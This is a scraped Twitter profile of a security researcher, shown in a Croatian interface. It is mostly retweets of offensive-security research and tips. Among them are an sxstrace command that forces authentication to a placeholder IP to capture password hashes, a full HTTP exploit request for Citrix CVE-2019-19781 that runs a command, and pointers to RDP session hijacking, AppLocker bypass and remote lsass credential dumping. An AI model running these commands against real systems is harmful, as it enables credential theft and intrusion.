Alexander Subbotin

@coreb1t

Security Researcher

Germany
Vrijeme pridruživanja: siječanj 2016.

Tweetovi

Blokirali ste korisnika/cu @coreb1t

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @coreb1t

  1. Prikvačeni tweet
    30. lis 2018.

    Here are slides of my talk "Tales of Practical Android Penetration Testing" where I've presented Mobile-Pentest-Toolkit (MPT) Thanks everyone for attending, I hope you enjoyed it.

    Poništi
  2. proslijedio/la je Tweet
    1. velj

    Load encrypted PE from XML Attribute. MSBuild is still the best.😅 MSBuild sets Property then calls Execute. Use this example to decouple payloads & prove that all security products have a "Single File Bias". Decouple payloads to subvert detection.

    Prikaži ovu nit
    Poništi
  3. proslijedio/la je Tweet
    24. sij

    A new way to exfiltrate hash by forcing auth ? Check this : sxstrace parse -logfile:\\192.168.XX.XX\lol.etl -outfile:a.txt || sxstrace trace -logfile:\\192.168.xx.xx\a   cc

    Poništi
  4. proslijedio/la je Tweet
    24. sij

    Post-exploitation tip: Do you know how to trivially & remotely hijack an session without prompt nor warning on user's side using signed binary (no patch/multi-session) ? qwinsta+mstsc shadowing is the answer ;) Details:

    Poništi
  5. proslijedio/la je Tweet
    22. sij

    Revisiting RDP lateral movement and releasing a project that will be part of a bigger tool coming next week

    Poništi
  6. proslijedio/la je Tweet
    17. sij

    If you have AppLocker deployed, be aware that most times when Windows 10 is updated/upgraded, it creates a TASKS_MIGRATED folder under C:\windows\system32 that has the CREATOR OWNER, meaning that users can create and execute files from the folder and bypassing AppLocker 😱

    Prikaži ovu nit
    Poništi
  7. proslijedio/la je Tweet
    17. sij

    Vulnerability severity levels

    Poništi
  8. proslijedio/la je Tweet

    That epic Microsoft moment❤️ Recently worked on and ECC, so yes, 10 and 2016/2019 only. Previous versions like Windows 7 did not support personnal EC curves (only few NIST standard ones)

    Prikaži ovu nit
    Poništi
  9. proslijedio/la je Tweet
    14. sij

    I'm excited to share my post about discovering & exploiting multiple critical vulnerabilities in Cisco's DCNM. Busting Cisco's Beans :: Hardcoding Your Way to Hell PoC exploit code:

    Poništi
  10. proslijedio/la je Tweet
    13. sij

    For team blue: Turns out CVE-2019-19781 doesn't need a traversal, beware. POST /vpns/portal/scripts/newbm.pl HTTP/1.1 Host: <target> NSC_USER: ../../../netscaler/portal/templates/si NSC_NONCE: 5 Content-Length: 53 url=a&title=[%+({'BLOCK'='print+`id`'})%]

    Poništi
  11. proslijedio/la je Tweet
    13. sij
    Prikaži ovu nit
    Poništi
  12. Poništi
  13. proslijedio/la je Tweet
    10. sij
    Poništi
  14. proslijedio/la je Tweet
    10. sij

    Awesome research by looking at CVE-2019-19781 Citrix ADC RCE. Purposely not provided the fire and forget exploit (although this is well known now). Technical details provided for those looking at just how this issue manifests itself.

    Poništi
  15. proslijedio/la je Tweet
    2. sij

    lsassy 1.0.0 is finally out ! 🔸 Remotely dump **with built-in Windows tools only**, procdump is no longer necessary 🔸 Remotely parse lsass dumps to extract credentials 🔸 Link to to detect compromised users with path to Domain Admin

    Prikaži ovu nit
    Poništi
  16. proslijedio/la je Tweet
    25. pro 2019.

    Recovering a SIM card's PIN via APDU sniffing on a cellular home phone station

    Poništi
  17. proslijedio/la je Tweet
    24. pro 2019.

    Writeup on how I made $40,000 breaking the new Chromium Edge using essentially two XSS flaws.

    Poništi
  18. proslijedio/la je Tweet
    21. pro 2019.

    New writeup, one of my favorite bugs 🤠 - Filling in the Blanks: Exploiting Null Byte Buffer Overflow for a $40,000 Bounty Featuring...

    Poništi
  19. proslijedio/la je Tweet
    19. pro 2019.

    Bypass SSL Pinning and intercept HTTPS with Burp with apk-mitm - A CLI application that automatically prepares Android APK files for HTTPS inspection

    Poništi
  20. proslijedio/la je Tweet
    18. pro 2019.
    Prikaži ovu nit
    Poništi
  21. proslijedio/la je Tweet
    18. lis 2019.

    (1/2) This was a big week in the community: released a great post about BloodHound for Blue Teamers: reminded us how to best prevent BloodHound data collection:

    Prikaži ovu nit
    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·